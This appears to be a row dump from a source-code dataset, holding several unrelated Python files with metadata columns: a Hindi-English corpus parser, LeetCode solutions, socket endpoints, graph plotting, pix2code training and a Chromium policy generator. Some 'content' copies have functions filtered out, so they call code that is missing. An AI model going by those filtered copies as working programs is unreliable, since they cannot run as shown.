hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e348cfac18c80bd7b466cf308e654ac0c004c60b | 5,977 | py | Python | utils/parseHindi.py | anshulsamar/seq | c117cc4b30b3825b20afbdcf25d314b192951dcb | [
"Apache-2.0"
] | null | null | null | utils/parseHindi.py | anshulsamar/seq | c117cc4b30b3825b20afbdcf25d314b192951dcb | [
"Apache-2.0"
] | null | null | null | utils/parseHindi.py | anshulsamar/seq | c117cc4b30b3825b20afbdcf25d314b192951dcb | [
"Apache-2.0"
] | null | null | null | from random import shuffle
import random
import math
import string
import sys
import os
import string
import pdb
eng_punctuation = string.punctuation + '\xe2\x80\x9c' + '\xe2\x80\x9d'
hindi_punctuation = ['\xe0\xa5\xa4'] #danda
# words like don't are split into don ' t
# This version doesn't do anything about punctuation inside words
# and only considers punctuation at the beginning or end of a word
print sys.argv
if len(sys.argv) < 3:
print('python parseHindi.py nameOfSaveDir cutOff')
exit()
data_dir = '/deep/group/speech/asamar/nlp/data/hindi/source/'
save_dir = sys.argv[1] + '/'
cutOff = int(sys.argv[2])
print('Only sentences less than ' + str(cutOff) + ' will be taken from English.')
print('Only sentences less than ' + str(2*cutOff) + ' will be taken from Hindi.')
if not os.path.exists(save_dir):
print('Making directory ' + save_dir)
os.makedirs(save_dir)
print('Loading Original Hindi Dataset')
train_set_size = 273000
data = open(data_dir + 'hindencorp05.plaintext','r')
lines = data.readlines()
count = 0
print('Creating Train and Test Source Sets')
train_f = open(save_dir + 'ptb.train.txt', 'w')
test_f = open(save_dir + 'ptb.test.txt', 'w')
for line in lines:
if count < train_set_size:
train_f.write(line)
else:
test_f.write(line)
count = count + 1
data.close()
train_f.close()
test_f.close()
print('Building Vocabulary from Training Set')
punctuation = string.punctuation
eng_vocab = {}
hindi_vocab = {}
data = open(save_dir + 'ptb.train.txt','r')
num_lines = 0
max_eng_length = 0
max_hindi_length = 0
corresponding_line = ''
for line in data:
orig_line = line.lower().strip()
split_line = orig_line.split('\t')
eng_sent = splitSentence(split_line[3])
hindi_sent = splitSentence(split_line[4])
if len(eng_sent) < cutOff and len(hindi_sent) < 2*cutOff:
addToVocab(eng_vocab,eng_sent)
addToVocab(hindi_vocab,hindi_sent)
num_lines = num_lines + 1
if len(eng_sent) > max_eng_length:
max_eng_length = len(eng_sent)
if len(hindi_sent) > max_hindi_length:
max_hindi_length = len(hindi_sent)
corresponding_line = orig_line
print('Lines below cutoff: ' + str(num_lines))
print('Max English Length: ' + str(max_eng_length))
print('Max Hindi Length: ' + str(max_hindi_length))
print(corresponding_line)
data.close()
print('Sorting Eng Vocab')
eng_vocab = sorted(eng_vocab,key = lambda x: eng_vocab[x])
eng_vocab.reverse()
print('Sorting Hindi Vocab')
hindi_vocab = sorted(hindi_vocab,key = lambda x: hindi_vocab[x])
hindi_vocab.reverse()
print('Parsing Train and Test Set')
for a in [['ptb.train.txt','enc_train.txt','dec_train.txt'],['ptb.test.txt','enc_test.txt','dec_test.txt']]:
data = open(save_dir + a[0],'r')
enc_to = open(save_dir + a[1],'w')
dec_to = open(save_dir + a[2],'w')
count = 0
for line in data:
orig_line = line.lower().strip()
s = orig_line.split('\t')
eng_sent = splitSentence(s[3])
hindi_sent = splitSentence(s[4])
if len(eng_sent) < cutOff and len(hindi_sent) < 2*cutOff:
enc_to.write(removeOOV(eng_vocab,eng_sent).strip() + '\n')
dec_to.write(removeOOV(hindi_vocab,hindi_sent).strip() + '\n')
count = count + 1
if (count % 1000 == 0):
print('Finished parsing ' + str(count))
sys.stdout.flush()
data.close()
enc_to.close()
dec_to.close()
print('Total parsed: ' + str(count))
| 31.962567 | 116 | 0.59913 | from random import shuffle
import random
import math
import string
import sys
import os
import string
import pdb
eng_punctuation = string.punctuation + '\xe2\x80\x9c' + '\xe2\x80\x9d'
hindi_punctuation = ['\xe0\xa5\xa4'] #danda
# words like don't are split into don ' t
def splitSentence(from_sent):
split_sent = []
start = 0
from_sent = from_sent.split()
for word in from_sent:
start = 0
if '\xe2\x80\x9c' in word:
word = word.replace('\xe2\x80\x9c','\"')
if '\xe2\x80\x9d' in word:
word = word.replace('\xe2\x80\x9d','\"')
if word in string.punctuation or word in hindi_punctuation:
split_sent.append(word)
else:
for i in range(0,len(word)):
if word[i] in string.punctuation or word[i] in hindi_punctuation:
if word[start:i] != '':
split_sent.append(word[start:i])
split_sent.append(word[i])
start = i + 1
#if word[i] == '\'' and i != 0 and i != (len(word) - 1) and word[i+1] not in string.punctuation:
# split_sent.append(word[i::])
# start = len(word)
# break
else:
split_sent.append(word[i])
start = i + 1
if word[start::] != '':
split_sent.append(word[start::])
return split_sent
# This version doesn't do anything about punctuation inside words
# and only considers punctuation at the beginning or end of a word
def splitSentenceFast(from_sent):
split_sent = []
start = 0
from_sent = from_sent.split()
for word in from_sent:
start = 0
if '\xe2\x80\x9c' in word:
word = word.replace('\xe2\x80\x9c','\"')
if '\xe2\x80\x9d' in word:
word = word.replace('\xe2\x80\x9d','\"')
if word in string.punctuation or word in hindi_punctuation:
split_sent.append(word)
start = 0
end = len(word)
if word[0] in string.punctuation:
split_sent.append(word[0])
start = 1
if word[-1] in string.punctuation:
split_sent.append(word[start:-1])
split_sent.append(word[-1])
else:
split_sent.append(word[start::])
return split_sent
def addToVocab(vocab,sent):
for i in range(0,len(sent)):
if sent[i] in vocab:
vocab[sent[i]] = vocab[sent[i]] + 1
else:
vocab[sent[i]] = 1
def removeOOV(vocab,sent):
new_sent = ''
for i in range(0,len(sent)):
if sent[i] in vocab and vocab.index(sent[i]) < 10000:
new_sent = new_sent + sent[i] + ' '
else:
new_sent = new_sent + '<unk> '
return new_sent
print sys.argv
if len(sys.argv) < 3:
print('python parseHindi.py nameOfSaveDir cutOff')
exit()
data_dir = '/deep/group/speech/asamar/nlp/data/hindi/source/'
save_dir = sys.argv[1] + '/'
cutOff = int(sys.argv[2])
print('Only sentences less than ' + str(cutOff) + ' will be taken from English.')
print('Only sentences less than ' + str(2*cutOff) + ' will be taken from Hindi.')
if not os.path.exists(save_dir):
print('Making directory ' + save_dir)
os.makedirs(save_dir)
print('Loading Original Hindi Dataset')
train_set_size = 273000
data = open(data_dir + 'hindencorp05.plaintext','r')
lines = data.readlines()
count = 0
print('Creating Train and Test Source Sets')
train_f = open(save_dir + 'ptb.train.txt', 'w')
test_f = open(save_dir + 'ptb.test.txt', 'w')
for line in lines:
if count < train_set_size:
train_f.write(line)
else:
test_f.write(line)
count = count + 1
data.close()
train_f.close()
test_f.close()
print('Building Vocabulary from Training Set')
punctuation = string.punctuation
eng_vocab = {}
hindi_vocab = {}
data = open(save_dir + 'ptb.train.txt','r')
num_lines = 0
max_eng_length = 0
max_hindi_length = 0
corresponding_line = ''
for line in data:
orig_line = line.lower().strip()
split_line = orig_line.split('\t')
eng_sent = splitSentence(split_line[3])
hindi_sent = splitSentence(split_line[4])
if len(eng_sent) < cutOff and len(hindi_sent) < 2*cutOff:
addToVocab(eng_vocab,eng_sent)
addToVocab(hindi_vocab,hindi_sent)
num_lines = num_lines + 1
if len(eng_sent) > max_eng_length:
max_eng_length = len(eng_sent)
if len(hindi_sent) > max_hindi_length:
max_hindi_length = len(hindi_sent)
corresponding_line = orig_line
print('Lines below cutoff: ' + str(num_lines))
print('Max English Length: ' + str(max_eng_length))
print('Max Hindi Length: ' + str(max_hindi_length))
print(corresponding_line)
data.close()
print('Sorting Eng Vocab')
eng_vocab = sorted(eng_vocab,key = lambda x: eng_vocab[x])
eng_vocab.reverse()
print('Sorting Hindi Vocab')
hindi_vocab = sorted(hindi_vocab,key = lambda x: hindi_vocab[x])
hindi_vocab.reverse()
print('Parsing Train and Test Set')
for a in [['ptb.train.txt','enc_train.txt','dec_train.txt'],['ptb.test.txt','enc_test.txt','dec_test.txt']]:
data = open(save_dir + a[0],'r')
enc_to = open(save_dir + a[1],'w')
dec_to = open(save_dir + a[2],'w')
count = 0
for line in data:
orig_line = line.lower().strip()
s = orig_line.split('\t')
eng_sent = splitSentence(s[3])
hindi_sent = splitSentence(s[4])
if len(eng_sent) < cutOff and len(hindi_sent) < 2*cutOff:
enc_to.write(removeOOV(eng_vocab,eng_sent).strip() + '\n')
dec_to.write(removeOOV(hindi_vocab,hindi_sent).strip() + '\n')
count = count + 1
if (count % 1000 == 0):
print('Finished parsing ' + str(count))
sys.stdout.flush()
data.close()
enc_to.close()
dec_to.close()
print('Total parsed: ' + str(count))
| 2,360 | 0 | 92 |
601f07a9d220323fc83bfb20cfcc81fe7983dd95 | 548 | py | Python | easy/283. Move Zeroes.py | junyinglucn/leetcode | 1fbd0962e4b7dc46b4ed4f0f86778cfedbda72e7 | [
"MIT"
] | null | null | null | easy/283. Move Zeroes.py | junyinglucn/leetcode | 1fbd0962e4b7dc46b4ed4f0f86778cfedbda72e7 | [
"MIT"
] | null | null | null | easy/283. Move Zeroes.py | junyinglucn/leetcode | 1fbd0962e4b7dc46b4ed4f0f86778cfedbda72e7 | [
"MIT"
] | null | null | null | # Solution A
# Solution B
| 21.92 | 51 | 0.421533 | # Solution A
class Solution:
def moveZeroes(self, nums):
if not nums:
return 0
i = 0
for j in range(len(nums)):
if nums[j]:
nums[i] = nums[j]
i += 1
for j in range(i, len(nums)):
nums[j] = 0
# Solution B
class Solution:
def moveZeroes(self, nums):
if not nums:
return 0
j = 0
for i in range(len(nums)):
if nums[i]:
nums[j], nums[i] = nums[i], nums[j]
j += 1
| 436 | -12 | 96 |
f0c559f76ba2dfee10760eeb157eef237ae05544 | 2,967 | py | Python | pypeman/endpoints.py | klausfmh/pypeman | 4eabfc537fb9b995480d65f8233f767fe99efcc1 | [
"Apache-2.0"
] | 6 | 2016-04-19T15:26:11.000Z | 2021-03-16T18:06:53.000Z | pypeman/endpoints.py | mhcomm/pypeman | 6583fae28bcb47e3b8091c39a91854ae36172cbd | [
"Apache-2.0"
] | 68 | 2016-05-12T16:10:11.000Z | 2022-03-02T01:30:36.000Z | pypeman/endpoints.py | klausfmh/pypeman | 4eabfc537fb9b995480d65f8233f767fe99efcc1 | [
"Apache-2.0"
] | 9 | 2015-12-23T08:23:03.000Z | 2021-09-03T09:22:51.000Z | import asyncio
import logging
import socket
logger = logging.getLogger(__name__)
all_endpoints = []
def reset_pypeman_endpoints():
"""
clears book keeping of all endpoints
Can be useful for unit testing.
"""
all_endpoints.clear()
from pypeman.helpers import lazyload # noqa: E402
wrap = lazyload.Wrapper(__name__)
wrap.add_lazy('pypeman.contrib.http', 'HTTPEndpoint', ['aiohttp'])
wrap.add_lazy('pypeman.contrib.hl7', 'MLLPEndpoint', ['hl7'])
| 29.376238 | 99 | 0.560836 | import asyncio
import logging
import socket
logger = logging.getLogger(__name__)
all_endpoints = []
def reset_pypeman_endpoints():
"""
clears book keeping of all endpoints
Can be useful for unit testing.
"""
all_endpoints.clear()
class BaseEndpoint:
def __init__(self):
all_endpoints.append(self)
async def start(self):
pass
class SocketEndpoint(BaseEndpoint):
def __init__(self, loop=None, sock=None, default_port='8080', reuse_port=None):
"""
:param reuse_port: bool if true then the listening port specified in the url parameter)
will be shared with other processes on same port
no effect with bound socket object
:param sock: string 'host:port'
or socket-string ("unix:/sojet/file/path")
or bound socket object
"""
super().__init__()
self.loop = loop or asyncio.get_event_loop()
self.reuse_port = reuse_port
self.sock = self.normalize_socket(sock, default_port=default_port)
@staticmethod
def normalize_socket(sock, default_port="8080"):
if isinstance(sock, str):
if not sock.startswith('unix:'):
if ':' not in sock:
sock += ':'
host, port = sock.split(":")
host = host or '127.0.0.1'
port = port or default_port
sock = host + ':' + port
return sock
@staticmethod
def mk_socket(sock, reuse_port):
"""
make, bind and return socket if string object is passed
if not return sock as is
"""
if isinstance(sock, str):
if not sock.startswith('unix:'):
try:
host, port = sock.split(":")
port = int(port)
if not host:
raise
bind_param = (host, port)
except Exception:
logger.exception('error on sock params in socket endpoint')
raise
sock_obj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
else:
bind_param = sock.split(":", 1)[1]
sock_obj = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
if reuse_port:
SO_REUSEPORT = 15
sock_obj.setsockopt(socket.SOL_SOCKET, SO_REUSEPORT, 1)
sock_obj.bind(bind_param)
else:
sock_obj = sock
return sock_obj
def make_socket(self):
"""
make and bind socket if string object is passed
"""
self.sock_obj = self.mk_socket(self.sock, self.reuse_port)
from pypeman.helpers import lazyload # noqa: E402
wrap = lazyload.Wrapper(__name__)
wrap.add_lazy('pypeman.contrib.http', 'HTTPEndpoint', ['aiohttp'])
wrap.add_lazy('pypeman.contrib.hl7', 'MLLPEndpoint', ['hl7'])
| 414 | 1,976 | 100 |
162b96b51249301f1c4ae7e666bd60e4bfd68af2 | 677 | py | Python | data/gen_GN.py | leo201313/pysimuComplexNetwork | 5ee6b2e61b1b6f587edb2a948cafb4fd869ad8ba | [
"MIT"
] | null | null | null | data/gen_GN.py | leo201313/pysimuComplexNetwork | 5ee6b2e61b1b6f587edb2a948cafb4fd869ad8ba | [
"MIT"
] | null | null | null | data/gen_GN.py | leo201313/pysimuComplexNetwork | 5ee6b2e61b1b6f587edb2a948cafb4fd869ad8ba | [
"MIT"
] | null | null | null | import networkx as nx
import matplotlib.pyplot as plt
G_fb = nx.read_edgelist("facebook_combined.txt", create_using = nx.Graph(), nodetype=int)
print(nx.info(G_fb))
# if need drawing
ps = nx.spring_layout(G_fb)
nx.draw(G_fb, ps, with_labels = False, node_size = 5)
plt.show()
# ps = nx.spring_layout(G_fb)
# betCent = nx.betweenness_centrality(G_fb, normalized=True, endpoints=True)
# node_color = [20000.0 * G_fb.degree(v) for v in G_fb]
# node_size = [v * 10000 for v in betCent.values()]
# plt.figure(figsize=(20,20))
# nx.draw_networkx(G_fb, pos=ps, with_labels=False,
# node_color=node_color,
# node_size=node_size )
# plt.axis('off') | 33.85 | 89 | 0.694239 | import networkx as nx
import matplotlib.pyplot as plt
G_fb = nx.read_edgelist("facebook_combined.txt", create_using = nx.Graph(), nodetype=int)
print(nx.info(G_fb))
# if need drawing
ps = nx.spring_layout(G_fb)
nx.draw(G_fb, ps, with_labels = False, node_size = 5)
plt.show()
# ps = nx.spring_layout(G_fb)
# betCent = nx.betweenness_centrality(G_fb, normalized=True, endpoints=True)
# node_color = [20000.0 * G_fb.degree(v) for v in G_fb]
# node_size = [v * 10000 for v in betCent.values()]
# plt.figure(figsize=(20,20))
# nx.draw_networkx(G_fb, pos=ps, with_labels=False,
# node_color=node_color,
# node_size=node_size )
# plt.axis('off') | 0 | 0 | 0 |
6482b7c2f93f1b8d9a3b2bfa04efecc920a5fabc | 1,200 | py | Python | path_planning/pyqtgraph_test.py | matthaeusheer/playground | 407086c8070cf71280b426db61fbe03034283760 | [
"MIT"
] | null | null | null | path_planning/pyqtgraph_test.py | matthaeusheer/playground | 407086c8070cf71280b426db61fbe03034283760 | [
"MIT"
] | 1 | 2020-11-14T09:42:28.000Z | 2020-11-14T09:42:28.000Z | path_planning/pyqtgraph_test.py | matthaeusheer/playground | 407086c8070cf71280b426db61fbe03034283760 | [
"MIT"
] | null | null | null | from pyqtgraph.Qt import QtGui, QtCore
import numpy as np
import pyqtgraph as pg
import random
# Create the main application instance
pg.setConfigOption('background', 'w')
app = pg.mkQApp()
view = pg.PlotWidget()
view.resize(800, 600)
view.setWindowTitle('Scatter plot using pyqtgraph with PyQT5')
view.setAspectLocked(True)
view.show()
n = 1000
print('Number of points: ' + str(n))
data = np.random.normal(size=(2, n))
# Create the scatter plot and add it to the view
scatter = pg.ScatterPlotItem(pen=pg.mkPen(width=5, color='r'), symbol='d', size=2)
view.setXRange(-10, 10)
view.setYRange(-10, 10)
view.addItem(scatter)
pos = [{'pos': data[:, i]} for i in range(n)]
now = pg.ptime.time()
scatter.setData(pos)
print("Plot time: {} sec".format(pg.ptime.time() - now))
timer = QtCore.QTimer()
timer.timeout.connect(update)
timer.start(0)
if __name__ == '__main__':
import sys
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
| 23.529412 | 82 | 0.6875 | from pyqtgraph.Qt import QtGui, QtCore
import numpy as np
import pyqtgraph as pg
import random
# Create the main application instance
pg.setConfigOption('background', 'w')
app = pg.mkQApp()
view = pg.PlotWidget()
view.resize(800, 600)
view.setWindowTitle('Scatter plot using pyqtgraph with PyQT5')
view.setAspectLocked(True)
view.show()
n = 1000
print('Number of points: ' + str(n))
data = np.random.normal(size=(2, n))
# Create the scatter plot and add it to the view
scatter = pg.ScatterPlotItem(pen=pg.mkPen(width=5, color='r'), symbol='d', size=2)
view.setXRange(-10, 10)
view.setYRange(-10, 10)
view.addItem(scatter)
pos = [{'pos': data[:, i]} for i in range(n)]
now = pg.ptime.time()
scatter.setData(pos)
print("Plot time: {} sec".format(pg.ptime.time() - now))
def update():
global scatter, data
data = data = np.random.normal(size=(2, n))
pos = [{'pos': data[:, i]} for i in range(n)]
scatter.setData(pos)
app.processEvents()
timer = QtCore.QTimer()
timer.timeout.connect(update)
timer.start(0)
if __name__ == '__main__':
import sys
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
| 164 | 0 | 23 |
13bf024126f34b18d324f0ca9bb1bb8e2e18d82c | 2,229 | py | Python | model/train.py | enixjm/pix2code | ad617cbca9d0c39cbecf426cc9fdc6f08059f4d8 | [
"Apache-2.0"
] | null | null | null | model/train.py | enixjm/pix2code | ad617cbca9d0c39cbecf426cc9fdc6f08059f4d8 | [
"Apache-2.0"
] | null | null | null | model/train.py | enixjm/pix2code | ad617cbca9d0c39cbecf426cc9fdc6f08059f4d8 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
__author__ = 'Tony Beltramelli - www.tonybeltramelli.com'
import tensorflow as tf
sess = tf.Session(config=tf.ConfigProto(log_device_placement=True))
import sys
from classes.dataset.Generator import *
from classes.model.pix2code import *
if __name__ == "__main__":
argv = sys.argv[1:]
if len(argv) < 2:
print "Error: not enough argument supplied:"
print "train.py <input path> <output path> <is memory intensive (default: 0)> <pretrained weights (optional)>"
exit(0)
else:
input_path = argv[0]
output_path = argv[1]
use_generator = False if len(argv) < 3 else True if int(argv[2]) == 1 else False
pretrained_weigths = None if len(argv) < 4 else argv[3]
run(input_path, output_path, is_memory_intensive=use_generator, pretrained_model=pretrained_weigths)
| 34.292308 | 126 | 0.720054 | #!/usr/bin/env python
__author__ = 'Tony Beltramelli - www.tonybeltramelli.com'
import tensorflow as tf
sess = tf.Session(config=tf.ConfigProto(log_device_placement=True))
import sys
from classes.dataset.Generator import *
from classes.model.pix2code import *
def run(input_path, output_path, is_memory_intensive=False, pretrained_model=None):
np.random.seed(1234)
dataset = Dataset()
dataset.load(input_path, generate_binary_sequences=True)
dataset.save_metadata(output_path)
dataset.voc.save(output_path)
if not is_memory_intensive:
dataset.convert_arrays()
input_shape = dataset.input_shape
output_size = dataset.output_size
print len(dataset.input_images), len(dataset.partial_sequences), len(dataset.next_words)
print dataset.input_images.shape, dataset.partial_sequences.shape, dataset.next_words.shape
else:
gui_paths, img_paths = Dataset.load_paths_only(input_path)
input_shape = dataset.input_shape
output_size = dataset.output_size
steps_per_epoch = dataset.size / BATCH_SIZE
voc = Vocabulary()
voc.retrieve(output_path)
generator = Generator.data_generator(voc, gui_paths, img_paths, batch_size=BATCH_SIZE, generate_binary_sequences=True)
model = pix2code(input_shape, output_size, output_path)
if pretrained_model is not None:
model.model.load_weights(pretrained_model)
if not is_memory_intensive:
model.fit(dataset.input_images, dataset.partial_sequences, dataset.next_words)
else:
model.fit_generator(generator, steps_per_epoch=steps_per_epoch)
if __name__ == "__main__":
argv = sys.argv[1:]
if len(argv) < 2:
print "Error: not enough argument supplied:"
print "train.py <input path> <output path> <is memory intensive (default: 0)> <pretrained weights (optional)>"
exit(0)
else:
input_path = argv[0]
output_path = argv[1]
use_generator = False if len(argv) < 3 else True if int(argv[2]) == 1 else False
pretrained_weigths = None if len(argv) < 4 else argv[3]
run(input_path, output_path, is_memory_intensive=use_generator, pretrained_model=pretrained_weigths)
| 1,351 | 0 | 23 |
557b7f3c6e40e0d49df35a36e2bb1426aaf857c8 | 2,209 | py | Python | chrome/browser/ash/policy/tools/generate_device_policy_remover.py | zealoussnow/chromium | fd8a8914ca0183f0add65ae55f04e287543c7d4a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 14,668 | 2015-01-01T01:57:10.000Z | 2022-03-31T23:33:32.000Z | chrome/browser/ash/policy/tools/generate_device_policy_remover.py | zealoussnow/chromium | fd8a8914ca0183f0add65ae55f04e287543c7d4a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 86 | 2015-10-21T13:02:42.000Z | 2022-03-14T07:50:50.000Z | chrome/browser/ash/policy/tools/generate_device_policy_remover.py | zealoussnow/chromium | fd8a8914ca0183f0add65ae55f04e287543c7d4a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 5,941 | 2015-01-02T11:32:21.000Z | 2022-03-31T16:35:46.000Z | # Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Create function which removes the specified device policies
from ChromeDeviceSettingsProto.
This function is primarily intended to be used
for the implementation of the DeviceOffHours policy.
"""
from optparse import OptionParser
import sys
file_header = """//
// DO NOT MODIFY THIS FILE DIRECTLY!
// IT IS GENERATED BY generate_device_policy_remover.py
// FROM chrome_device_policy_pb2.py
//
#include "chrome/browser/ash/policy/core/device_policy_remover.h"
namespace policy {
void RemovePolicies(enterprise_management::ChromeDeviceSettingsProto* policies,
const std::vector<int>& policy_proto_tags_to_remove) {
for (const int tag : policy_proto_tags_to_remove) {
switch(tag) {
"""
file_footer = """ }
}
}
} // namespace policy
"""
if __name__ == '__main__':
sys.exit(main())
| 31.112676 | 79 | 0.722952 | # Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Create function which removes the specified device policies
from ChromeDeviceSettingsProto.
This function is primarily intended to be used
for the implementation of the DeviceOffHours policy.
"""
from optparse import OptionParser
import sys
file_header = """//
// DO NOT MODIFY THIS FILE DIRECTLY!
// IT IS GENERATED BY generate_device_policy_remover.py
// FROM chrome_device_policy_pb2.py
//
#include "chrome/browser/ash/policy/core/device_policy_remover.h"
namespace policy {
void RemovePolicies(enterprise_management::ChromeDeviceSettingsProto* policies,
const std::vector<int>& policy_proto_tags_to_remove) {
for (const int tag : policy_proto_tags_to_remove) {
switch(tag) {
"""
file_footer = """ }
}
}
} // namespace policy
"""
def main():
parser = OptionParser(usage=__doc__)
(opts, args) = parser.parse_args()
off_hours_cleaner_path = args[0]
descriptor_pool_path = args[1]
symbol_database_path = args[2]
chrome_device_policy_pb2_path = args[3]
sys.path.insert(0, descriptor_pool_path)
sys.path.append(symbol_database_path)
sys.path.append(chrome_device_policy_pb2_path)
# Make reload google library
# which might be already loaded due to Google App Engine
# TODO(crbug.com/764314): find better solution how to import protobuf.
import google.protobuf
# Python 3 doesn't expose a global `reload`.
if sys.version_info.major == 2:
reload(google)
reload(google.protobuf)
else:
import importlib
importlib.reload(google)
importlib.reload(google.protobuf)
from chrome_device_policy_pb2 import ChromeDeviceSettingsProto
with open(off_hours_cleaner_path, 'wt') as file:
file.write(file_header);
for field in ChromeDeviceSettingsProto.DESCRIPTOR.fields:
file.write(' case {proto_tag}:\n'
' policies->clear_{name}();\n'
' break;\n'
.format(proto_tag=field.number, name=field.name))
file.write(file_footer);
return 0
if __name__ == '__main__':
sys.exit(main())
| 1,203 | 0 | 23 |
70c78495a8a8355cdf25a72248ee053acbe5d09e | 4,051 | py | Python | utility_functions/checkpoint_manager.py | MSREnable/GazeCapture | 54f00ab428a7dbb51f8f0c37f22bba6b3cb54726 | [
"RSA-MD"
] | 15 | 2019-08-28T22:06:51.000Z | 2021-10-08T09:52:13.000Z | utility_functions/checkpoint_manager.py | MSREnable/GazeCapture | 54f00ab428a7dbb51f8f0c37f22bba6b3cb54726 | [
"RSA-MD"
] | null | null | null | utility_functions/checkpoint_manager.py | MSREnable/GazeCapture | 54f00ab428a7dbb51f8f0c37f22bba6b3cb54726 | [
"RSA-MD"
] | 6 | 2020-11-18T02:46:55.000Z | 2021-07-08T11:12:11.000Z | import math
import os
import shutil
import torch
from collections import OrderedDict
| 41.762887 | 124 | 0.655887 | import math
import os
import shutil
import torch
from collections import OrderedDict
def extract_checkpoint_data(args, model):
best_rms_error = math.inf
epoch = 1
val_rms_errors = []
test_rms_errors = []
train_rms_errors = []
best_rms_errors = []
learning_rates = []
if not args.reset:
# Load last checkpoint if training otherwise load best checkpoint for evaluation
filename = 'checkpoint.pth.tar' if args.phase == 'Train' or args.phase == 'Info' else 'best_checkpoint.pth.tar'
saved = load_checkpoint(args.output_path, args.device, filename)
if saved:
epoch = saved.get('epoch', epoch)
# for backward compatibility
val_rms_errors = saved.get('RMSErrors', saved.get('val_RMSErrors', val_rms_errors))
test_rms_errors = saved.get('test_RMSErrors', test_rms_errors)
train_rms_errors = saved.get('train_RMSErrors', train_rms_errors)
best_rms_error = saved.get('best_RMSError', best_rms_error)
best_rms_errors = saved.get('best_RMSErrors', best_rms_errors)
learning_rates = saved.get('learning_rates', learning_rates)
print(
'Loading checkpoint : [Epoch: %d | RMSError: %.5f].' % (
epoch,
best_rms_error)
)
# don't load model for the info-only task
if not args.info:
# We should start training on the epoch after the last full epoch
epoch = epoch + 1
try:
state = saved['state_dict']
model.load_state_dict(state)
except RuntimeError:
# The most likely cause of a failure to load is that there is a leading "module." from training. This is
# normal for models trained with DataParallel. If not using DataParallel, then the "module." needs to be
# removed.
state = remove_module_from_state(saved)
model.load_state_dict(state)
else:
print('Warning: Could not read checkpoint!')
return val_rms_errors, test_rms_errors, train_rms_errors, best_rms_errors, best_rms_error, epoch, learning_rates
def load_checkpoint(checkpoints_path, device, filename='checkpoint.pth.tar'):
filename = os.path.join(checkpoints_path, filename)
print(filename)
if not os.path.isfile(filename):
return None
state = torch.load(filename, map_location=device)
return state
def save_checkpoint(state, is_best, checkpointsPath, saveCheckpoints, filename='checkpoint.pth.tar'):
resultsFilename = os.path.join(checkpointsPath, 'results.json')
checkpointFilename = os.path.join(checkpointsPath, filename)
torch.save(state, checkpointFilename)
if saveCheckpoints:
shutil.copyfile(checkpointFilename,
os.path.join(checkpointsPath, 'checkpoint' + str(state['epoch']) + '.pth.tar'))
shutil.copyfile(resultsFilename, os.path.join(checkpointsPath, 'results' + str(state['epoch']) + '.json'))
shutil.copyfile('ITrackerModel.py', os.path.join(checkpointsPath, 'ITrackerModel.py'))
shutil.copyfile('ITrackerData.py', os.path.join(checkpointsPath, 'ITrackerData.py'))
bestFilename = os.path.join(checkpointsPath, 'best_' + filename)
bestResultsFilename = os.path.join(checkpointsPath, 'best_results.json')
if is_best:
shutil.copyfile(checkpointFilename, bestFilename)
shutil.copyfile(resultsFilename, bestResultsFilename)
def remove_module_from_state(saved_state):
# when using Cuda for training we use DataParallel. When using DataParallel, there is a
# 'module.' added to the namespace of the item in the dictionary.
# remove 'module.' from the front of the name to make it compatible with cpu only
state = OrderedDict()
for key, value in saved_state['state_dict'].items():
state[key[7:]] = value.to(device='cpu')
return state
| 3,869 | 0 | 92 |
27a22c03eb1f5ac3a0f550ccf77ba60c76ff7601 | 1,418 | py | Python | subreddit_simulator/database.py | dimitern/SubredditSimulator | b0a43746c688507547646019717ce9e630520f90 | [
"MIT"
] | null | null | null | subreddit_simulator/database.py | dimitern/SubredditSimulator | b0a43746c688507547646019717ce9e630520f90 | [
"MIT"
] | null | null | null | subreddit_simulator/database.py | dimitern/SubredditSimulator | b0a43746c688507547646019717ce9e630520f90 | [
"MIT"
] | null | null | null | import json
from logging import getLogger
import attr
from sqlalchemy import Text, TypeDecorator, create_engine
from sqlalchemy.orm import sessionmaker
logger = getLogger(__name__)
@attr.s(auto_attribs=True)
| 24.033898 | 73 | 0.614951 | import json
from logging import getLogger
import attr
from sqlalchemy import Text, TypeDecorator, create_engine
from sqlalchemy.orm import sessionmaker
logger = getLogger(__name__)
class JSONSerialized(TypeDecorator):
impl = Text
